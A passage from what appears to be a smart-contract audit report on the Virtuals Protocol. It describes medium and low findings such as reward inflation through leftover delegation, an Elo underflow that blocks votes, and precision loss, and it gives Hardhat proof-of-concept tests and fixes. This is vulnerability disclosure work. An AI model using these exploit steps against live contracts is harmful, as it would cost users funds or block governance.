// Check if contract has enough agent token balance only after agentTokenAddress be set
require(
IERC20(agentTokenAddress).balanceOf(address(this)) >= totalDistributionAmount,
"Insufficient Agent Token balance"
);
// Directly transfer Virtual Token refunds
for (uint256 i = 0; i < refundVirtualsTokenUserAddresses.length; i++) {
// first decrease the virtuals mapping of the user to prevent reentrancy attacks
mapAddrToVirtuals[refundVirtualsTokenUserAddresses[i]] -= refundVirtualsTokenUserAmounts[i];
// then transfer the virtuals
IERC20(virtualTokenAddress).safeTransfer(
refundVirtualsTokenUserAddresses[i],
refundVirtualsTokenUserAmounts[i]
);
emit RefundClaimed(genesisId, refundVirtualsTokenUserAddresses[i], refundVirtualsTokenUserAmounts[i]);
}
// save the amount of agent tokens to claim
for (uint256 i = 0; i < distributeAgentTokenUserAddresses.length; i++) {
@> claimableAgentTokens[distributeAgentTokenUserAddresses[i]] = distributeAgentTokenUserAmounts[i];
}
emit GenesisSucceeded(genesisId);
return agentTokenAddress;
}Multiple launches can occur, which is why the isFirstLaunch flag is implemented. However, there’s an issue in how agentTokens are accounted for in the claimableAgentTokens mapping.
Currently, the mapping value is being overwritten instead of incremented. This means if a user doesn’t call claimAgentToken() to redeem their agentTokens before a subsequent launch occurs, the second launch will overwrite the previous value resulting in a loss of agentTokens from the first launch.
Recommended mitigation steps
To resolve the issue, update the logic to add the new agentTokens amount instead of overwriting it.
function onGenesisSuccess(
address[] calldata refundVirtualsTokenUserAddresses,
uint256[] calldata refundVirtualsTokenUserAmounts,
address[] calldata distributeAgentTokenUserAddresses,
uint256[] calldata distributeAgentTokenUserAmounts,
address creator
) external onlyRole(FACTORY_ROLE) nonReentrant whenNotCancelled whenNotFailed whenEnded returns (address) {
require(refundUserCountForFailed == 0, "OnGenesisFailed already called");
require(
refundVirtualsTokenUserAddresses.length == refundVirtualsTokenUserAmounts.length,
"Mismatched refund arrays"
);
require(
distributeAgentTokenUserAddresses.length == distributeAgentTokenUserAmounts.length,
"Mismatched distribution arrays"
);
// Calculate total refund amount
uint256 totalRefundAmount = 0;
for (uint256 i = 0; i < refundVirtualsTokenUserAmounts.length; i++) {
// check if the user has enough virtuals committed
require(
mapAddrToVirtuals[refundVirtualsTokenUserAddresses[i]] >= refundVirtualsTokenUserAmounts[i],
"Insufficient Virtual Token committed"
);
totalRefundAmount += refundVirtualsTokenUserAmounts[i];
}
// Check if launch has been called before
bool isFirstLaunch = agentTokenAddress == address(0);
// Calculate required balance based on whether this is first launch
uint256 requiredVirtualsBalance = isFirstLaunch ? totalRefundAmount + reserveAmount : totalRefundAmount;
// Check if contract has enough virtuals balance
require(
IERC20(virtualTokenAddress).balanceOf(address(this)) >= requiredVirtualsBalance,
"Insufficient Virtual Token balance"
);
// Only do launch related operations if this is first launch
if (isFirstLaunch) {
// grant allowance to agentFactoryAddress for launch
IERC20(virtualTokenAddress).approve(agentFactoryAddress, reserveAmount);
// Call initFromBondingCurve and executeBondingCurveApplication
uint256 id = IAgentFactoryV3(agentFactoryAddress).initFromBondingCurve(
string.concat(genesisName, " by Virtuals"),
genesisTicker,
genesisCores,
tbaSalt,
tbaImplementation,
daoVotingPeriod,
daoThreshold,
reserveAmount,
creator
);
address agentToken = IAgentFactoryV3(agentFactoryAddress).executeBondingCurveApplication(
id,
agentTokenTotalSupply,
agentTokenLpSupply,
address(this) // vault
);
require(agentToken != address(0), "Agent token creation failed");
// Store the created agent token address
agentTokenAddress = agentToken;
}
// Calculate total distribution amount
uint256 totalDistributionAmount = 0;
for (uint256 i = 0; i < distributeAgentTokenUserAmounts.length; i++) {
totalDistributionAmount += distributeAgentTokenUserAmounts[i];
}
// Check if contract has enough agent token balance only after agentTokenAddress be set
require(
IERC20(agentTokenAddress).balanceOf(address(this)) >= totalDistributionAmount,
"Insufficient Agent Token balance"
);
// Directly transfer Virtual Token refunds
for (uint256 i = 0; i < refundVirtualsTokenUserAddresses.length; i++) {
// first decrease the virtuals mapping of the user to prevent reentrancy attacks
mapAddrToVirtuals[refundVirtualsTokenUserAddresses[i]] -= refundVirtualsTokenUserAmounts[i];
// then transfer the virtuals
IERC20(virtualTokenAddress).safeTransfer(
refundVirtualsTokenUserAddresses[i],
refundVirtualsTokenUserAmounts[i]
);
emit RefundClaimed(genesisId, refundVirtualsTokenUserAddresses[i], refundVirtualsTokenUserAmounts[i]);
}
// save the amount of agent tokens to claim
for (uint256 i = 0; i < distributeAgentTokenUserAddresses.length; i++) {
- claimableAgentTokens[distributeAgentTokenUserAddresses[i]] = distributeAgentTokenUserAmounts[i];
+ claimableAgentTokens[distributeAgentTokenUserAddresses[i]] += distributeAgentTokenUserAmounts[i];
}
emit GenesisSucceeded(genesisId);
return agentTokenAddress;
}[M-19] Lack of maturity check for non-founder users allowing immediate withdrawals
Submitted by Pelz, also found by aiota, gregom, and Ishenxx
Finding description and impact
In the AgentVeToken::withdraw() function, the contract contains a check for the maturity of stakes, but this check only applies to the founding staker (founder). The condition is:
if ((sender == founder) && ((balanceOf(sender) - amount) < initialLock)) {
require(block.timestamp >= matureAt, "Not mature yet");
}This ensures that the founding staker must wait for a lockup period before withdrawing if their balance falls below initialLock.
However, there is no such lockup or maturity check for non-founder users. If canStake is enabled for all users, any user who stakes tokens can withdraw immediately, bypassing any intended lockup or maturity period. This flaw effectively removes any staking or lockup incentive for users who stake their tokens, as they can withdraw at will without any restriction.
Recommended mitigation steps
To address this issue, a maturity check should be applied to all users who stake tokens. This would ensure that all users are subject to the same withdrawal restrictions, and their stakes are locked for a specified period before they can withdraw. Recommended approach:
Implement the lockup for non-founder users: Ensure that all users, not just the founder, are locked in for a set period before being allowed to withdraw. You could add logic to set a different lockup period for different classes of users if needed.
[M-20] Delegation not revoked on withdrawal allows reward and voting power inflation post-maturity
Submitted by yaractf, also found by Ishenxx and nnamdi0482
Finding description and impact
Stakers delegate their voting power using the stake() function, which internally calls _delegate(receiver, delegatee) and records the delegatee via checkpointing at the current clock() (block number). Upon maturity (matureAt), the withdraw() function allows full withdrawal of tokens, including by the stakers.
function stake(uint256 amount, address receiver, address delegatee) public {
require(canStake || totalSupply() == 0, "Staking is disabled for private agent"); // Either public or first staker
address sender = _msgSender();
require(amount > 0, "Cannot stake 0");
require(IERC20(assetToken).balanceOf(sender) >= amount, "Insufficient asset token balance");
require(IERC20(assetToken).allowance(sender, address(this)) >= amount, "Insufficient asset token allowance");
IAgentNft registry = IAgentNft(agentNft);
uint256 virtualId = registry.stakingTokenToVirtualId(address(this));
require(!registry.isBlacklisted(virtualId), "Agent Blacklisted");
if (totalSupply() == 0) {
initialLock = amount;
}
registry.addValidator(virtualId, delegatee);
IERC20(assetToken).safeTransferFrom(sender, address(this), amount);
_mint(receiver, amount);
@> _delegate(receiver, delegatee);
_balanceCheckpoints[receiver].push(clock(), SafeCast.toUint208(balanceOf(receiver)));
}However, the withdraw() function does not call _delegate(sender, address(0)) to clean up delegations when a user fully withdraws their stake. This leaves the previous delegation entry active, even though the staker now has zero voting power.
function withdraw(uint256 amount) public noReentrant {
address sender = _msgSender();
require(balanceOf(sender) >= amount, "Insufficient balance");
if ((sender == founder) && ((balanceOf(sender) - amount) < initialLock)) {
require(block.timestamp >= matureAt, "Not mature yet");
}
@>
_burn(sender, amount);
_balanceCheckpoints[sender].push(clock(), SafeCast.toUint208(balanceOf(sender)));
IERC20(assetToken).safeTransfer(sender, amount);
}Once maturity is reached, a malicious user can exploit this flaw by:
- The user stakes tokens and delegates.
- Then immediately withdraws them when maturity.
- Repeats the cycle multiple times, possibly in the same block.
Each cycle leaves delegation entries intact while reducing the actual staked balance to zero.
The system uses getPastDelegates() in reward logic to compute historical rewards based on:
function getClaimableStakerRewards(
address account,
uint256 virtualId
) public view returns (uint256 totalClaimable, uint256 numRewards) {
Claim memory claim = _stakerClaims[account][virtualId];
numRewards = Math.min(LOOP_LIMIT + claim.rewardCount, getAgentRewardCount(virtualId));
IAgentVeToken veToken = IAgentVeToken(IAgentNft(agentNft).virtualLP(virtualId).veToken);
IAgentDAO dao = IAgentDAO(IAgentNft(agentNft).virtualInfo(virtualId).dao);
for (uint i = claim.rewardCount; i < numRewards; i++) {
AgentReward memory agentReward = getAgentReward(virtualId, i);
Reward memory reward = getReward(agentReward.rewardIndex);
@> address delegatee = veToken.getPastDelegates(account, reward.blockNumber);
uint256 uptime = dao.getPastScore(delegatee, reward.blockNumber);
uint256 stakedAmount = veToken.getPastBalanceOf(account, reward.blockNumber);
uint256 stakerReward = (agentReward.stakerAmount * stakedAmount) / agentReward.totalStaked;
stakerReward = (stakerReward * uptime) / agentReward.totalProposals;
totalClaimable += stakerReward;
}
}As a result, repeated delegation records combined with zeroed balances allow the delegatee to appear historically more active, and to receive inflated uptime-based rewards; even though the stake was not present at the time.
Impact
- Reward distribution becomes exploitable by staking and undelegating rapidly after maturity.
- Delegatees receive excessive rewards due to inflated uptime scores based on
getPastDelegates(). - Governance power and monetary reward flows become decoupled from actual stake and participation.
- Fairness of the protocol is compromised; malicious users can game the system at the expense of honest stakers and voters.
Recommended mitigation steps
Update the withdraw() function to automatically clear a user’s delegation when their token balance drops to zero. This prevents the retention of voting power or reward eligibility after the staker has exited.
[M-21] battleElo is at risk of underflow revert, which may DOS voting
Submitted by oakcobalt, also found by testnate
In EloCalculator.sol, the battleElo() function calculates a new maturity score based on a series of battle results:
function battleElo(uint256 currentRating, uint8[] memory battles) public view returns (uint256) {
uint256 eloA = 1000;
uint256 eloB = 1000;
for (uint256 i = 0; i < battles.length; i++) {
uint256 result = mapBattleResultToGameResult(battles[i]);
(uint256 change, bool negative) = Elo.ratingChange(eloB, eloA, result, k);
change = _roundUp(change, 100);
if (negative) {
eloA -= change;
eloB += change;
} else {
eloA += change;
eloB -= change;
}
}
return currentRating + eloA - 1000; //@audit Potential underflow here
}When calculating results of a series of battle, battleElo will subtract currentRating by the difference in rate change. currentRating + eloA - 1000
Under current AgentDao implementation in _castVote → _updateMaturity → _calcMaturity, uint8[] memory battles can result in a negative change to the currentRating. This case is allowed in the protocol because we see ServiceNft handles the case when _maturities[proposalId] < _maturities[prevServiceId] in updateImpact.
When a validator casts a vote that results in a negative change in currentRating, this might cause currentRating + eloA - 1000 underflow revert when currentRating is already low.
Impact
DOS conditions:
- Validators may be unable to submit valid votes with specific battle results.
- The governance mechanism may be partially blocked for low-maturity services.
- The voting process could be disrupted when trying to express certain opinions.
Recommended mitigation steps
In battleElo, consider checking and handling currentRating + eloA - 1000 underflow case and return a minimal rating value when the underflow case is triggered.
Proof of Concept
Test logics:
- Base proposal:
proposal1executed. - Check
proposal1’s maturity. validatorA’s voting power is twice asvalidatorB.proposal2is created (intended as an upgrade fromproposal1).validatorAcast a Vote with [0, 0, 0, 0, 0, 0, 1, 0, 1, 0].castVoterevert due to underflow.castVotewith specific results DOSsed.
Added unit test underflow DOS certain voting in test/rewardsV2.js. Run test with: npx hardhat test test/rewardsV2.js:
it.only("underflow DOS certain voting", async function () {
//setup:
// 1. base proposal: proposal1 executed
// 2. check proposal1's maturity
// 3. validatorA's voting power is twice as validatorB.
// 4. proposal2 is created (intended as an upgrade from proposal1)
// 5. validatorA cast a Vote with [0, 0, 0, 0, 0, 0, 1, 0, 1, 0]
// 6. castVote revert due to underflow. castVote with specific results DOSsed.
const base = await loadFixture(deployWithAgent);
const { serviceNft, contributionNft, agentNft, virtualToken } = base;
const {
founder,
contributor1,
contributor2,
validator1,
validator2,
trader,
} = await getAccounts();
// Setup LP and voting power
const agentToken = await ethers.getContractAt(
"AgentToken",
base.agent.token
);
const veToken = await ethers.getContractAt(
"AgentVeToken",
base.agent.veToken
);
const lp = await ethers.getContractAt("IERC20", base.agent.lp);
// Delegate founder's votes to validator1 (founder holds a large amount of tokens)
await veToken.connect(founder).delegate(validator1.address);
// Set up validator2 with LP tokens - similar to the validator uptime test
const router = await ethers.getContractAt(
"IUniswapV2Router02",
process.env.UNISWAP_ROUTER
);
// Verify voting power
const daoAddr = (await agentNft.virtualInfo(1)).dao;
const agentDAO = await ethers.getContractAt("AgentDAO", daoAddr);
const validator1Votes = await veToken.getVotes(validator1.address);
console.log("Validator1 votes:", formatEther(validator1Votes));
// Step 1: Create base proposal and get it executed
const proposalId1 = await createContribution(
1, // virtualId
0, // coreId (Cognitive Core)
0, // parentId
true, // isModel
0, // no dataset dependency
"Base contribution",
base,
contributor1.address,
[validator1], // Only validator1 votes on this one
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
);
// Step 2: Check proposalId1's maturity
const maturity1 = await serviceNft.getMaturity(proposalId1);
console.log("Base proposal maturity:", maturity1.toString());
expect(maturity1).to.be.gt(0);
// Step 3: Create proposal2 (intended as an upgrade)
const descHash2 = getDescHash("Improved contribution");
const mintCalldata2 = await getMintServiceCalldata(
serviceNft,
1,
descHash2
);
await agentDAO.propose(
[serviceNft.target],
[0],
[mintCalldata2],
"Improved contribution"
);
// Get the proposalId
const events = await agentDAO.queryFilter(
agentDAO.filters.ProposalCreated,
-1
);
const proposalId2 = events[events.length - 1].args[0];
// Create contribution NFT
await contributionNft.mint(
contributor2.address,
1, // virtualId
0, // coreId
TOKEN_URI,
proposalId2,
0, // parentId
true, // isModel
0 // no datasetId
);
// Step 4: Validator1 casts honest forVote with battles results
const honestVoteParams = abi.encode(
["uint8[] memory"],
[[0, 0, 0, 0, 0, 0, 1, 0, 1, 0]]
);
await expect(
agentDAO
.connect(validator1)
.castVoteWithReasonAndParams(
proposalId2,
1,
"Good improvement",
honestVoteParams
)
).to.be.revertedWithPanic(0x11);
console.log(
"validator1 vote for proposal2 reverted with 0x11 underflow panic code"
);
});Test results:
RewardsV2
Validator1 votes: 9999999.999999999999999
Base proposal maturity: 100
validator1 vote for proposal2 reverted with 0x11 underflow panic code
✔ underflow DOS certain voting (1540ms)
1 passing (2s)[M-22] Founder has to double-stake during migration with the initial LP locked in the old veToken
Submitted by oakcobalt, also found by gkrastenov
During the migration process implemented in AgentMigrator.sol, founders face a double-staking problem where their original LP tokens remain locked in the old AgentVeToken contract while they must provide additional virtual tokens for the migration to the new system.
Vulnerabilities
The AgentMigrator.migrateAgent() function creates new token, LP, veToken, and DAO contracts but fails to provide a mechanism to migrate the founder’s locked tokens from the old veToken contract:
function migrateAgent(
uint256 id,
string memory name,
string memory symbol,
bool canStake
) external noReentrant {
// ...
// Deploy Agent token & LP
address token = _createNewAgentToken(name, symbol);
address lp = IAgentToken(token).liquidityPools()[0];
IERC20(_assetToken).transferFrom(founder, token, initialAmount);
IAgentToken(token).addInitialLiquidity(address(this));
// Deploy AgentVeToken
address veToken = _createNewAgentVeToken(
string.concat("Staked ", name),
string.concat("s", symbol),
lp,
founder,
canStake
);
// ...
_nft.migrateVirtual(id, dao, token, lp, veToken);
// Stake LP in new veToken
IERC20(lp).approve(veToken, type(uint256).max);
IAgentVeToken(veToken).stake(
IERC20(lp).balanceOf(address(this)),
founder,
founder
);
// ...
}Meanwhile, the original LP tokens remain locked in the old veToken due to the withdrawal restriction in AgentVeToken.withdraw():
function withdraw(uint256 amount) public noReentrant {
address sender = _msgSender();
require(balanceOf(sender) >= amount, "Insufficient balance");
if ((sender == founder) && ((balanceOf(sender) - amount) < initialLock)) {
require(block.timestamp >= matureAt, "Not mature yet");
}
// ...
}Impact
- Founders must provide duplicate capital (virtual tokens) during migration, as they cannot retrieve their original LP tokens to retrieve originally deposited virtual tokens in the old uniswap pair.
- Original LP tokens remain locked in obsolete contracts for 10 years. Due to the bonding curve graduation requirements and genesis requirements, the locked virtual token values are significant (roughly 35000 virtual tokens (35000 usd) required to graduate a bonding curve pair).
Recommended mitigation steps
- Modify the AgentMigrator contract to include a mechanism to unlock LP tokens from the old
veTokenduring migration. - Add a privileged function to the AgentVeToken contract that allows the founder to withdraw their locked tokens in case of a migration.
Proof of Concept
- Founder deployed initial bonding curve.
- It requires roughly 35000 virtual tokens (35000 usd) to graduate and deploy agent tokens. At graduation, these are converted to LP tokens and locked in the original veToken, with the founder being unable to withdraw the
initialLockamount. - The protocol team deploys new versions of the Agent contracts and encourages migration.
- The founder attempts to migrate their Agent using
AgentMigrator.migrateAgent(). - The founder must transfer additional virtual tokens to the new token contract to create new LP (assuming around the same amount of virtual tokens are required).
- New LP tokens are staked in the new
veToken, but the original LP tokens (worth~35,000 usd) remain locked in the oldveToken. - The founder now has capital locked in two places - the new
veToken(functional) and the oldveToken(obsolete). - The founder cannot withdraw their original locked LP until after 10 years from the original deployment date.
[M-23] Using AgentFactory::setAssetToken will lead to loss of funds
Submitted by YouCrossTheLineAlfie
The AgentFactory::assetToken is initially set upon early initialize call:
// AgentFactory.sol
function initialize(
// . . . Rest of the code . . .
) public initializer {
__Pausable_init();
tokenImplementation = tokenImplementation_;
veTokenImplementation = veTokenImplementation_;
daoImplementation = daoImplementation_;
assetToken = assetToken_; <<@ -- // Sets assetToken initially
tbaRegistry = tbaRegistry_;
nft = nft_;
applicationThreshold = applicationThreshold_;
_nextId = 1;
_grantRole(DEFAULT_ADMIN_ROLE, msg.sender);
_vault = vault_;
}This assetToken is being used inside AgentFactory::executeApplication, AgentFactory::_createNewAgentToken and AgentFactory::withdraw.
However, changing this assetToken via AgentFactory::setAssetToken has serious complications;
function setAssetToken(address newToken) public onlyRole(DEFAULT_ADMIN_ROLE) {
assetToken = newToken; <<@ -- // Sets `assetToken`
}These issues are described below:
AgentFactory::withdrawfunction would fail as the newassetTokenwill be different from the funds held by the contract duringproposeAgentcall.
function withdraw(uint256 id) public noReentrant {
Application storage application = _applications[id];
require(msg.sender == application.proposer || hasRole(WITHDRAW_ROLE, msg.sender), "Not proposer");
require(application.status == ApplicationStatus.Active, "Application is not active");
require(block.number > application.proposalEndBlock, "Application is not matured yet");
uint256 withdrawableAmount = application.withdrawableAmount;
application.withdrawableAmount = 0;
application.status = ApplicationStatus.Withdrawn;
IERC20(assetToken).safeTransfer(application.proposer, withdrawableAmount); <<@ -- // Would break due to different assetToken than upon proposal
}AgentFactory::executeApplicationwould fail as there might be no newassetTokenavailable inside the contract:
function executeApplication(uint256 id, bool canStake) public noReentrant {
// . . . Rest of the code . . .
// C2
address lp = IAgentToken(token).liquidityPools()[0];
IERC20(assetToken).transfer(token, initialAmount); <<@ -- // Would revert
IAgentToken(token).addInitialLiquidity(address(this));- There is no way available to recover old
assetTokenbalance as the contract lacks arecoverERC20kind of function. - If there were a case where
assetTokenwere available inside the contract, the_createNewAgentTokenwould use unintendedassetTokenthan what it was actually proposed to:
function _createNewAgentToken(string memory name, string memory symbol) internal returns (address instance) {
instance = Clones.clone(tokenImplementation);
IAgentToken(instance).initialize(
[_tokenAdmin, _uniswapRouter, assetToken], <<@ -- // Initialising agent token
abi.encode(name, symbol),
_tokenSupplyParams,
_tokenTaxParams
);
allTradingTokens.push(instance);
return instance;
}This cannot be mitigated with current implementation as Base has a private mempool, the protocol in no capacity can guarantee that before setAssetToken all tokens are withdrawn by the WITHDRAW_ROLE.
Also, these issues are commonly found inside the AgentFactoryV3 and AgentFactoryV4 contracts.
Recommended mitigation steps
It is recommended that instead of using a public variable of assetToken in function calls other than proposeAgent, add the asset token’s address directly inside the Application struct and fetch it, as these calls anyways use the Application struct’s mapping:
struct Application {
string name;
string symbol;
string tokenURI;
+ address tokenAddress;
ApplicationStatus status;
uint256 withdrawableAmount;
address proposer;
uint8[] cores;
uint256 proposalEndBlock;
uint256 virtualId;
bytes32 tbaSalt;
address tbaImplementation;
uint32 daoVotingPeriod;
uint256 daoThreshold;
}Updated withdraw:
function withdraw(uint256 id) public noReentrant {
Application storage application = _applications[id];
require(msg.sender == application.proposer || hasRole(WITHDRAW_ROLE, msg.sender), "Not proposer");
require(application.status == ApplicationStatus.Active, "Application is not active");
require(block.number > application.proposalEndBlock, "Application is not matured yet");
uint256 withdrawableAmount = application.withdrawableAmount;
application.withdrawableAmount = 0;
application.status = ApplicationStatus.Withdrawn;
- IERC20(assetToken).safeTransfer(application.proposer, withdrawableAmount);
+ IERC20(application.tokenAddress).safeTransfer(application.proposer, withdrawableAmount);
}Updated executeApplication:
function executeApplication(uint256 id, bool canStake) public noReentrant {
// . . . Rest of the code . . .
// C2
address lp = IAgentToken(token).liquidityPools()[0];
- IERC20(assetToken).transfer(token, initialAmount);
+ IERC20(application.tokenAddress).transfer(token, initialAmount);
IAgentToken(token).addInitialLiquidity(address(this));Updated _createNewAgentToken:
- function _createNewAgentToken(string memory name, string memory symbol) internal returns (address instance) {
+ function _createNewAgentToken(string memory name, string memory symbol, address memory applicationAssetToken) internal returns (address instance) {
instance = Clones.clone(tokenImplementation);
IAgentToken(instance).initialize(
- [_tokenAdmin, _uniswapRouter, assetToken],
+ [_tokenAdmin, _uniswapRouter, applicationAssetToken],
abi.encode(name, symbol),
_tokenSupplyParams,
_tokenTaxParams
);
allTradingTokens.push(instance);
return instance;
}This would ensure that changing assetToken does not break any flow.
[M-24] Precision loss in priceALast and priceBLast
Submitted by hecker_trieu_tien, also found by 0xterrah, holtzzx, PotEater, and rayss
https://github.com/code-423n4/2025-04-virtuals-protocol/blob/main/contracts/fun/FPair.sol#L103
Finding description and impact
The price calculation functions priceALast and priceBLast use integer division (/) directly on the pool reserves (_pool.reserve0, _pool.reserve1). Integer division in Solidity truncates any fractional part of the result, leading to significant precision loss.
Scenario
- The pool has reserves
_pool.reserve1 = 199 * 10**18and_pool.reserve0 = 100 * 10**18. - A call to
priceALast()executes_pool.reserve1 / _pool.reserve0which is(199 * 10**18) / (100 * 10**18). - Due to integer division, the result is truncated from the actual price (1.99) to
1. - Alternatively, if
_pool.reserve1 = 99 * 10**18and_pool.reserve0 = 100 * 10**18, the calculation(99 * 10**18) / (100 * 10**18)results in0because integer division rounds down. The same logic applies symmetrically topriceBLastwhen_pool.reserve0is divided by_pool.reserve1.
Recommended mitigation steps
To fix this issue, the contract should use a fixed-point arithmetic approach. Scale the numerator by a large factor (e.g., 10^18) before division.
Proof of Concept
describe("Price Calculation Precision Loss", function () {
it("should demonstrate precision loss in priceALast function", async function () {
const { fPair, router } = await loadFixture(deployFPairFixture);
// Scenario 1: reserve1 = 199 * 10^18, reserve0 = 100 * 10^18
// Expected price: 1.99, but due to integer division, it will be 1
const reserve0 = parseEther("100");
const reserve1 = parseEther("199");
// Since only router can call mint, we need to impersonate it
await fPair.connect(router).mint(reserve0, reserve1);
// Check reserves were set correctly
const [actualReserve0, actualReserve1] = await fPair.getReserves();
expect(actualReserve0).to.equal(reserve0);
expect(actualReserve1).to.equal(reserve1);
// Check price calculation
const priceA = await fPair.priceALast();
console.log("Actual price should be 1.99, but priceALast() returns:", priceA.toString());
// Verify the precision loss - price should be 1 instead of 1.99
expect(priceA).to.equal(1);
// Calculate the actual price with higher precision (using JavaScript)
const actualPrice = Number(formatEther(reserve1)) / Number(formatEther(reserve0));
console.log("Actual price calculated with JavaScript:", actualPrice);
console.log("Precision loss:", actualPrice - Number(priceA));
});[M-25] Incorrect mathematical logic
Submitted by djshan_eden, also found by Matin and Nexarion
Finding description
There is a fundamental error in the ELO calculation formula. For example, when ratingA=1000 and ratingB=800, the code calculation result deviates greatly from the standard formula. The core problem lies in the exponent processing:
The correct calculation should be 10^(ratingDiff/400), but the code incorrectly converts the exponent through n = 800 ± ratingDiff and the fourth square root, resulting in an incorrect powered value.
Impact
All ELO rating changes are calculated incorrectly, the rating system is completely untrustworthy, and attackers can use this vulnerability to obtain abnormally high rating changes.
Recommended mitigation steps
- Remove offset: Handle the positive and negative rating differences directly.
- Accurate exponential calculation: Use a high-precision library (such as ABDKMath) to calculate
10^(ratingDiff/400). - Avoid decomposition errors: Abandon multi-step square root decomposition and handle the raw exponential directly.
Proof of Concept
1. Differences between the original formula and the code implementation:
Correct formula - the expected ELO score is:
ratingDiff = _negative ? ratingA - ratingB : ratingB - ratingA
expected score = 1 / (1 + 10 ^ (ratingDiff / 400))Code error steps - the contract attempts to optimize the calculation by factoring the exponent, but introduces a fatal error:
n = _negative ? 800 - ratingDiff: 800 + ratingDiff;
_powered = fp.rpow(10, n / 25, 1); // calculate10^(n/25)
powered = sixteenthRoot(_powered); // The fourth square root → is equivalent to10^(n/(25 * 16)) = 10^(n/400)On the surface, the math is equivalent to 10^(ratingDiff/400), but the offset of 800 completely breaks the logic.
2. Sign error caused by offset
Example analysis - Assume that RA=1000, RB=800, then:
Correct case - The exponent is (1000−800)/400=0.5, and the denominator is 1+10^0.5≈4.1623.
Code calculation:
ratingDiff = 200, _negative = true
n = 800 - 200 = 600
n/25 = 24 → 10 ^24
Fourth square root → 10 ^(24/16)=10^1.5≈31.623
The denominator becomes 100+31.623=131.623, which is much smaller than the correct value 4.1623. Results: expected score was incorrectly inflated, causing a complete distortion in the ELO change calculation.
3. Summary of the root causes of the error
- Wrong offset: The introduction of
800 ± ratingDiffhas no mathematical basis, resulting in double errors in the exponent sign and magnitude. - Decomposition steps are incompatible with integer operations: the correct decomposition should be
10^ratingDiff/400 = (10^ratingDiff/25)^1/16. But afternwas incorrectly offset in the code, the actual calculation of10^(800±ratingDiff)/(25×16)is equivalent to10^(800±ratingDiff)/400, which is completely deviated from the original formula. - Sign processing is reversed: when
RA>RB, the exponent should be positive, but the offset in the code makes it become(800−ratingDiff)/400, resulting in the reverse calculation of the denominator.
Virtuals marked as informative
[M-26] Imprecise calculations in launchFor() lead to less liquidity be added to the pair via the router
Submitted by Matin, also found by codexNature
Finding description and impact
Solidity rounds down the result of an integer division, and because of that, it is always recommended to multiply before dividing to avoid that precision loss. The problem arises in the Bonding.sol’s launchFor() function where the liquidity is calculated:
function launchFor(
string memory _name,
string memory _ticker,
uint8[] memory cores,
string memory desc,
string memory img,
string[4] memory urls,
uint256 purchaseAmount,
address creator
) public nonReentrant returns (address, address, uint) {
// code
uint256 k = ((K * 10000) / assetRate);
uint256 liquidity = (((k * 10000 ether) / supply) * 1 ether) / 10000;Although this model is implemented to calculate the k, we can see there is a hidden division before a multiplication that makes round down the whole expression. This is bad as the precision loss can be significant, which leads to the pool calculating less liquidity than actual.
Recommended mitigation steps
Consider changing the liquidity calculation in the way that prioritize the multiplication over division or use the high precision fixed point math libraries (e.g. PRB math lib).
Proof of Concept
uint256 public constant K = 3_000_000_000_000;
function testPrecisionLoss(
uint256 assetRate,
uint supply
) public pure returns (uint256 act, uint256 acc) {
uint256 k = ((K * 10000) / assetRate);
act = (((k * 10000 ether) / supply) * 1 ether) / 10000;
acc = (K * 10000 * 10000 ether * 1 ether) / (assetRate * supply * 10000);
}For the assetRate and supply equal to (7.98e15, 1.9283e18):
The result would be:
Current Implementation 1555700000000000000
Actual Implementation 1949592125831354822This is equal to ~25% relative error. Also, it is worth to mention that in some cases even the liquidity becomes zero. For the assetRate and supply equal to (1e18, 2e18), the result would be:
Current Implementation 0
Actual Implementation 15000000000000000Low Risk and Non-Critical Issues
For this audit, 38 reports were submitted by wardens detailing low risk and non-critical issues. The report highlighted below by Sparrow received the top score from the judge.
The following wardens also submitted reports: 0xdonchev, 0xhp9, alessio, Anyasaa, BlackAdam, cerweb10, chupinexx, codexNature, DanielTan, DanielTan_MetaTrust, FavourOkerri, francoHacker, geraldwenzel, gkrastenov, jeffy, joicygiore, K42, LeoGold, LhoussainePh, natachi, newspacexyz, Nexarion, Pelz, PolarizedLight, rayss, Rice_T, Roger, safie, Shinobi, Silverwind, slowbugmayor, sungjun0208, tacitvs, TheCarrot, unique, zhanmingjing, and zubyoz.
Note: QA report issues deemed invalid by the judge have been omitted from this report.
[01] Missing update of prevAgentId in promptMulti
The promptMulti function in AgentInference.sol is intended to optimize repeated calls to agentNft.virtualInfo(agentId).tba by caching the previous agentId and its corresponding TBA address. However, the variable prevAgentId is never updated within the loop. As a result, the optimization is non-functional: for each iteration, the contract will call agentNft.virtualInfo(agentId).tba whenever the current agentId is not zero, regardless of whether the agent ID has changed from the previous iteration. This leads to unnecessary repeated external calls, increasing gas costs and reducing efficiency.
uint256 prevAgentId = 0;
address agentTba = address(0);
for (uint256 i = 0; i < len; i++) {
uint256 agentId = agentIds[i];
if (prevAgentId != agentId) {
agentTba = agentNft.virtualInfo(agentId).tba;
}
token.safeTransferFrom(sender, agentTba, amounts[i]);
inferenceCount[agentId]++;
emit Prompt(sender, promptHashes[i], agentId, amounts[i], coreIds[i]);
}Recommended mitigation steps
Update prevAgentId to the current agentId after fetching a new TBA address within the loop. This ensures that the optimization works as intended and redundant calls are avoided.
[02] Duplicate import statement for Math.sol
In AgentInference.sol, the @openzeppelin/contracts/utils/math/Math.sol library is imported twice at the top of the file. This duplication is unnecessary and could lead to confusion for maintainers or reviewers. While it does not directly impact contract functionality or security, it is a code quality issue that can be easily avoided.
import "@openzeppelin/contracts/utils/math/Math.sol"; // Line 5
// ... other imports
import "@openzeppelin/contracts/utils/math/Math.sol"; // Line 8 - duplicated importRecommended mitigation steps
Remove the redundant import statement so that Math.sol is imported only once at the top of the contract file.
[03] Invalid agentId leads to token burning
The prompt and promptMulti functions in AgentInference.sol do not validate if an agentId exists in the agentNft contract before transferring tokens. If an invalid agentId is provided, agentNft.virtualInfo(agentId).tba will return address(0) (the zero address), causing tokens to be sent to this address. Sending tokens to the zero address effectively burns them, resulting in permanent loss of funds.
This issue can occur through user error (e.g., providing an incorrect agent ID) or potentially through malicious inputs in a front-end interface. The impact is severe as users have no way to recover tokens sent to the zero address.
// In prompt() function
uint256 agentId = agentIds[i];
address agentTba = agentNft.virtualInfo(agentId).tba;
token.safeTransferFrom(sender, agentTba, amounts[i]);// In promptMulti() function
uint256 agentId = agentIds[i];
if (prevAgentId != agentId) {
agentTba = agentNft.virtualInfo(agentId).tba;
}
token.safeTransferFrom(sender, agentTba, amounts[i]);Recommended mitigation steps
Add validation checks to ensure the agent ID exists and the TBA address is not the zero address before transferring tokens:
